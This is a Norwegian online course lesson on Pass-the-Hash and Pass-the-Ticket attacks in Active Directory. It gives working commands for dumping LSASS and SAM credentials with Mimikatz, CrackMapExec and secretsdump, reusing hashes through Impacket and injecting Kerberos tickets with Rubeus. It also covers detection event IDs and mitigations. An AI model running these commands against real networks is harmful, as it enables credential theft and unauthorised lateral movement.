Pass-the-Hash- og Pass-the-Ticket-angrep
Bruk legitimasjonshasher og Kerberos-billetter til lateral forflytning uten å kjenne passordene i klartekst.
Pass-the-Hash- og Pass-the-Ticket-angrep er en gratis leksjon i Cyber Security Academy på CoddyKit. Dette er leksjon 2 av 4. Du kan lese valgfritt 3 leksjoner fra denne læringsstien gratis i sin helhet – deretter låser CoddyKit PRO opp alle leksjoner, samt praktisk øving med en innebygd kodeeditor og en AI-veileder som er tilgjengelig døgnet rundt. Den er en del av læringsløpet i Cyber Security Academy, og fremdriften din synkroniseres mellom nettet og CoddyKit-appen. Kurset i Cyber Security Academy inneholder totalt 4 leksjoner.
Hvorfor disse angrepene finnes
Windows-protokoller for legitimasjon lagrer autentiseringshemmeligheter (NTLM-hasher og Kerberos-billetter) i minnet. En angriper med SYSTEM-rettigheter kan hente ut disse hemmelighetene og bruke dem på nytt til å autentisere som andre brukere uten å kjenne passordene.
Uttrekking av NTLM-hasher med Mimikatz
Mimikatz er det fremste verktøyet for uttrekking av legitimasjon på Windows. Når det kjøres som SYSTEM/Administrator, leser det minnet til LSASS-prosessen for å hente ut NTLM-hasher og legitimasjon i klartekst.
# Run mimikatz as Admin:
mimikatz.exe
# Enable debug privilege
privilege::debug
# Dump LSASS credentials
sekurlsa::logonpasswords
# Dump local SAM hashes
lsadump::samPass-the-Hash (PtH) med Mimikatz
PtH setter inn en NTLM-hash i en ny økt uten at klartekstpassordet er kjent. Hashen autentiserer mot fjerntjenester ved hjelp av NTLM – effektivt for lateral forflytning til andre Windows-verter.
# Pass-the-Hash with Mimikatz:
sekurlsa::pth /user:Administrator /domain:CORP \
/ntlm:aad3b435b51404eeaad3b435b51404ee \
/run:cmd.exe
# Opens cmd.exe authenticated as that userPass-the-Hash med Impacket
Impacket tilbyr Python-verktøy for PtH: psexec.py, smbexec.py og wmiexec.py godtar NTLM-hasher direkte for fjernkjøring av kommandoer.
# psexec with hash (Linux → Windows)
psexec.py CORP/Administrator@192.168.1.100 \
-hashes aad3b435...:8846f7eaee8fb117...
# wmiexec
wmiexec.py CORP/Admin@192.168.1.100 \
-hashes :8846f7eaee8fb117ad06bdd830b7586cUttrekking av Kerberos-billetter
Kerberos-billetter lagres også i LSASS-minnet. Mimikatz henter dem ut, mens Rubeus er det spesialiserte verktøyet for Kerberos-billettoperasjoner på Windows.
# Mimikatz: export all tickets
sekurlsa::tickets /export
# Rubeus: list tickets
Rubeus.exe triage
# Rubeus: dump specific ticket
Rubeus.exe dump /luid:0x3e7 /service:krbtgtPass-the-Ticket (PtT)
PtT setter inn en stjålet Kerberos-billett i den gjeldende økten. Billetten autentiserer mot tjenester som billettens opprinnelige eier – ingen hash eller passord er nødvendig.
# Mimikatz: inject ticket
kerberos::ptt ticket.kirbi
# Rubeus: inject ticket
Rubeus.exe ptt /ticket:ticket.kirbi
# Verify injection
klistFjerndumping av LSASS
Fra et fotfeste kan LSASS dumpes eksternt ved hjelp av CrackMapExec eller Impackets secretsdump – det er ikke nødvendig med en interaktiv økt på målet.
# CrackMapExec
crackmapexec smb 192.168.1.100 -u Admin -p Password123 --sam
crackmapexec smb 192.168.1.100 -u Admin -p Password123 --lsa
# Impacket secretsdump
secretsdump.py CORP/Admin:Password123@192.168.1.100Baner for lateral forflytning
Etter at hasher eller billetter er hentet ut, kan man bevege seg lateralt: bruk PtH mot andre maskiner med gjenbrukte lokale administratorrettigheter, bruk PtT for å få tilgang til domenetjenester, og eskaler mot domeneadministrator ved å målrette privilegerte kontoer.
Oppdaging av PtH og PtT
Forsvarere oppdager PtH ved hjelp av Event ID 4624 (pålogging) med påloggingstype 3 uten en tilsvarende interaktiv pålogging, avvik i NTLM-autentisering og Mimikatz-signaturer i minnet eller på disken.
# Detection event IDs:
# 4624: Logon (look for type 3 = network)
# 4776: NTLM auth (watch for unexpected hosts)
# 4769: Service ticket request (Kerberos)
# 4648: Explicit credential useTiltak
Viktige tiltak er å aktivere Credential Guard (beskytter LSASS ved hjelp av virtualisering), begrense gjenbruk av lokale administratorrettigheter på tvers av maskiner (LAPS), håndheve gruppen Protected Users for privilegerte kontoer og deaktivere NTLM der det er mulig.
Overpass-the-Hash
Overpass-the-Hash konverterer en NTLM-hash til en Kerberos-TGT. Dette er nyttig i miljøer der NTLM er blokkert, men Kerberos er tilgjengelig, eller når det er behov for en TGT til videre Kerberos-angrep.
# Mimikatz: overpass-the-hash
sekurlsa::pth /user:Admin /domain:CORP \
/ntlm:8846f7eaee8fb117ad06bdd830b7586c \
/run:powershell.exe
# Then in new session:
Rubeus.exe asktgt /user:Admin /rc4:8846f7ea...Hurtigsjekk
Hvilken sikkerhetsfunksjon i Windows beskytter lagringen av legitimasjon i LSASS ved hjelp av virtualisering?
Oppsummering: PtH og PtT
Pass-the-Hash og Pass-the-Ticket er grunnlaget for lateral forflytning i Active Directory. Begge utnytter Windows-bufring av legitimasjon i LSASS. Mimikatz og Impacket gjør uttrekking og gjenbruk enkelt. Beskytt miljøet med Credential Guard, LAPS, gruppen Protected Users og streng overvåking av autentiseringshendelser for NTLM og Kerberos.
Lær deg Cyber Security Academy med en AI-veileder – gratis
Skriv og kjør ekte kode i nettleseren, få umiddelbar hjelp fra en AI-veileder som er tilgjengelig døgnet rundt, og fortsett der du slapp – på nettet eller i appen.
- Kurs
- 76
- Leksjoner
- 303
Ofte stilte spørsmål
Er leksjonen «Pass-the-Hash- og Pass-the-Ticket-angrep» gratis?
Ja – du kan lese valgfritt 3 av leksjonene i læringsstien Cyber Security Academy, inkludert «Pass-the-Hash- og Pass-the-Ticket-angrep», gratis i sin helhet her på nettet. Deretter låser CoddyKit PRO opp alle leksjoner, samt interaktiv øving med en innebygd kodeeditor og en AI-veileder som er tilgjengelig døgnet rundt. Kurset i Cyber Security Academy inneholder totalt 4 leksjoner.
Hva lærer jeg i «Pass-the-Hash- og Pass-the-Ticket-angrep»?
Bruk legitimasjonshasher og Kerberos-billetter til lateral forflytning uten å kjenne passordene i klartekst. Du øver på Cyber Security Academy med praktisk kode som du kjører direkte i nettleseren, mens en AI-veileder som er tilgjengelig døgnet rundt, svarer på spørsmålene dine mens du jobber deg gjennom leksjonen.
Trenger jeg erfaring for å begynne med Cyber Security Academy?
Ingen tidligere erfaring er nødvendig. Cyber Security Academy på CoddyKit er lagt opp for både nybegynnere og viderekomne, så De kan begynne her eller helt fra start og lære i Deres eget tempo. Dette er leksjon 2 av 4.
Hvor lang tid tar leksjonen «Pass-the-Hash- og Pass-the-Ticket-angrep»?
De fleste CoddyKit-leksjoner tar omtrent 5–10 minutter. Hver leksjon er kort og interaktiv, slik at De gjør jevne fremskritt og kan fortsette akkurat der De slapp – både på nettet og i appen.
Kan jeg skrive og kjøre kode i denne Cyber Security Academy-leksjonen?
Ja. Alle Cyber Security Academy-leksjoner har en innebygd kodeeditor, slik at De kan skrive og kjøre ekte kode direkte i nettleseren og få umiddelbar tilbakemelding fra AI – uten lokal konfigurering.
Alle leksjonene i dette kurset
- Windows-autentisering: NTLM og Kerberos
- Pass-the-Hash- og Pass-the-Ticket-angrep
- Kerberoasting og AS-REP-roasting
- Herding av Active Directory